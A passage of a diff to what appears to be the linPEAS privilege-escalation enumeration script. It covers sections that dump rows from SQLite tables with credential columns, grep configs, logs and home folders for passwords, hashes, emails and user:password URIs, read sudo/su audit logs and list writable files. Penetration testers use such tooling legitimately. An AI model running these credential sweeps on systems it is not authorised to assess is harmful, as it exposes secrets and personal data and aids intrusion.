-${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + else + echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + fi + done + SQLITEPYTHON="" + echo "" + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do + if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd + printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC + if [ "$(command -v sqlite3 2>/dev/null)" ]; then + tables=$(sqlite3 $f ".tables" 2>/dev/null) + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" + elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then + SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null) + tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null) + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" + else + tables="" + fi + if [ "$tables" ]; then + printf "%s\n" "$tables" | while read t; do + columns="" + # Search for credentials inside the table using sqlite3 + if [ -z "$SQLITEPYTHON" ]; then + columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE") + # Search for credentials inside the table using python + else + columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) + fi + #Check found columns for interesting fields + INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") + if [ "$INTCOLUMN" ]; then + printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" + printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" + (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head + fi + done + echo "" + fi + fi + done +fi +echo "" + +if [ "$MACPEAS" ]; then + print_2title "Downloaded Files" + sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" +fi + +##-- IF) Web files +print_2title "Web files?(output limit)" +ls -alhR /var/www/ 2>/dev/null | head +ls -alhR /srv/www/htdocs/ 2>/dev/null | head +ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head +ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head +echo "" + +##-- IF) All hidden files +print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" +find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70 +echo "" + +##-- IF) Readable files in /tmp, /var/tmp, bachups +print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" +filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70) +printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done +echo "" + +##-- IF) Interesting writable files by ownership or all +if ! [ "$IAMROOT" ]; then + print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" + #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all + obmowbe=$(find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) + printf "%s\n" "$obmowbe" | while read entry; do + if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; + elif echo "$entry" | grep -qE "$writeVB"; then + echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," + else + echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," + fi + done + echo "" +fi + +##-- IF) Interesting writable files by group +if ! [ "$IAMROOT" ]; then + print_2title "Interesting GROUP writable files (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" + for g in $(groups); do + printf " Group $GREEN$g:\n$NC"; + iwfbg=$(find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) + printf "%s\n" "$iwfbg" | while read entry; do if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; - elif echo "$entry" | grep -qE "$writeVB"; then + elif echo "$entry" | grep -Eq "$writeVB"; then echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," else echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," fi done - echo "" - fi - - ##-- IF) Interesting writable files by group - if ! [ "$IAMROOT" ]; then - print_2title "Interesting GROUP writable files (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" - for g in $(groups); do - printf " Group $GREEN$g:\n$NC"; - iwfbg=$(find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) - printf "%s\n" "$iwfbg" | while read entry; do - if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; - elif echo "$entry" | grep -Eq "$writeVB"; then - echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," - else - echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," - fi - done - done - echo "" - fi - - ##-- IF) Passwords in config PHP files - print_2title "Searching passwords in config PHP files" - printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done + done echo "" - - ##-- IF) TTY passwords - print_2title "Checking for TTY (sudo/su) passwords in audit logs" - aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" - find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" - echo "" - - ##-- IF) IPs inside logs - print_2title "Finding IPs inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70 - echo "" - - ##-- IF) Passwords inside logs - print_2title "Finding passwords inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," - echo "" - - ##-- IF) Emails inside logs - print_2title "Finding emails inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g" - echo "" - - ##-- IF) Passwords files in home - print_2title "Finding *password* or *credential* files in home (limit 70)" - (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found - echo "" - - if ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then - ##-- IF) Find possible files with passwords - print_2title "Finding passwords inside key folders (limit 70) - only PHP files" - intpwdfiles=$(timeout 150 grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$HOMESEARCH" /var/www /usr/local/www/ "$backup_folders_row" /tmp /etc /root /mnt /Users /private 2>/dev/null) - printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" - echo "" - - print_2title "Finding passwords inside key folders (limit 70) - no PHP files" - printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" - echo "" - - ##-- IF) Find possible files with passwords - print_2title "Finding possible password variables inside key folders (limit 140)" - timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" - timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" - echo "" - - ##-- IF) Find possible conf files with passwords - print_2title "Finding possible password in config files" - ppicf=$(find "$HOMESEARCH" /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) - printf "%s\n" "$ppicf" | while read f; do - if grep -qEiI 'passwd.*|creden.*' \"$f\" 2>/dev/null; then - echo "$ITALIC $f$NC" - grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g" - fi - done - echo "" - - ##-- IF) Find possible files with usernames - print_2title "Finding 'username' string inside key folders (limit 70)" - timeout 150 grep -RiIE "username.*[=:].+" "$HOMESEARCH" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" - timeout 150 grep -RiIE "username.*[=:].+" /var/www "$backup_folders_row" /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" - echo "" - - ##-- IF) Specific hashes inside files - print_2title "Searching specific hashes inside files - less false positives (limit 70)" - regexblowfish='\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*' - regexjoomlavbulletin='[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}' - regexphpbb3='\$H\$[a-zA-Z0-9_/\.]{31}' - regexwp='\$P\$[a-zA-Z0-9_/\.]{31}' - regexdrupal='\$S\$[a-zA-Z0-9_/\.]{52}' - regexlinuxmd5='\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' - regexapr1md5='\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' - regexsha512crypt='\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}' - regexapachesha='\{SHA\}[0-9a-zA-Z/_=]{10,}' - timeout 150 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | head -n 70 | sed "s,:.*,${SED_RED}," - echo "" - fi - - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then - ##-- IF) Specific hashes inside files - print_2title "Searching md5/sha1/sha256/sha512 hashes inside files (limit 50 - only 1 per file)" - regexmd5='(^|[^a-zA-Z0-9])[a-fA-F0-9]{32}([^a-zA-Z0-9]|$)' - regexsha1='(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)' - regexsha256='(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)' - regexsha512='(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)' - timeout 150 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " #)There are more hashes files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${SED_RED}," | sed "s,There are more hashes files in the previous parent folder,${C}[3m&${C}[0m," - echo "" - fi - - if ! [ "$SUPERFAST" ] && ! [ "$FAST" ]; then - ##-- IF) Find URIs with user:password@hoststrings - print_2title "Finding URIs with user:password@host inside key folders" - timeout 150 find /var/www "$backup_folders_row" /tmp /etc /var/log /private/var/log -type f -exec grep -RiIE "://(.+):(.+)@" "{}" \; 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" "$HOMESEARCH" 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /mnt 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /root 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /Applications 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - echo "" - fi fi + +##-- IF) Passwords in config PHP files +print_2title "Searching passwords in config PHP files" +printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done +echo "" + +##-- IF) TTY passwords +print_2title "Checking for TTY (sudo/su) passwords in audit logs" +aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" +find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" +echo "" + +##-- IF) IPs inside logs +print_2title "Finding IPs inside logs (limit 70)" +(find /var/log/ /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70 +echo "" + +##-- IF) Passwords inside logs +print_2title "Finding passwords inside logs (limit 70)" +(find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," +echo "" + +##-- IF) Emails inside logs +print_2title "Finding emails inside logs (limit 70)" +(find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g" +echo "" + +##-- IF) Passwords files in home +print_2title "Finding *password* or *credential* files in home (limit 70)" +(printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found +echo "" + +if ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then + ##-- IF) Find possible files with passwords + print_2title "Finding passwords inside key folders (limit 70) - only PHP files" + intpwdfiles=$(timeout 150 grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$HOMESEARCH" /var/www /usr/local/www/ "$backup_folders_row" /tmp /etc /root /mnt /Users /private 2>/dev/null) + printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" + echo "" + + print_2title "Finding passwords inside key folders (limit 70) - no PHP files" + printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" + echo "" + + ##-- IF) Find possible files with passwords + print_2title "Finding possible password variables inside key folders (limit 140)" + timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" + timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" + echo "" + + ##-- IF) Find possible conf files with passwords + print_2title "Finding possible password in config files" + ppicf=$(find "$HOMESEARCH" /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) + printf "%s\n" "$ppicf" | while read f; do + if grep -qEiI 'passwd.*|creden.*' \"$f\" 2>/dev/null; then + echo "$ITALIC $f$NC" + grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g" + fi + done + echo "" + + ##-- IF) Find possible files with usernames + print_2title "Finding 'username' string inside key folders (limit 70)" + timeout 150 grep -RiIE "username.*[=:].+" "$HOMESEARCH" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" + timeout 150 grep -RiIE "username.*[=:].+" /var/www "$backup_folders_row" /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" + echo "" + + ##-- IF) Specific hashes inside files + print_2title "Searching specific hashes inside files - less false positives (limit 70)" + regexblowfish='\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*' + regexjoomlavbulletin='[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}' + regexphpbb3='\$H\$[a-zA-Z0-9_/\.]{31}' + regexwp='\$P\$[a-zA-Z0-9_/\.]{31}' + regexdrupal='\$S\$[a-zA-Z0-9_/\.]{52}' + regexlinuxmd5='\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' + regexapr1md5='\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' + regexsha512crypt='\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}' + regexapachesha='\{SHA\}[0-9a-zA-Z/_=]{10,}' + timeout 150 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | head -n 70 | sed "s,:.*,${SED_RED}," + echo "" +fi + +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then + ##-- IF) Specific hashes inside files + print_2title "Searching md5/sha1/sha256/sha512 hashes inside files (limit 50 - only 1 per file)" + regexmd5='(^|[^a-zA-Z0-9])[a-fA-F0-9]{32}([^a-zA-Z0-9]|$)' + regexsha1='(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)' + regexsha256='(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)' + regexsha512='(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)' + timeout 150 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " #)There are more hashes files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${SED_RED}," | sed "s,There are more hashes files in the previous parent folder,${C}[3m&${C}[0m," + echo "" 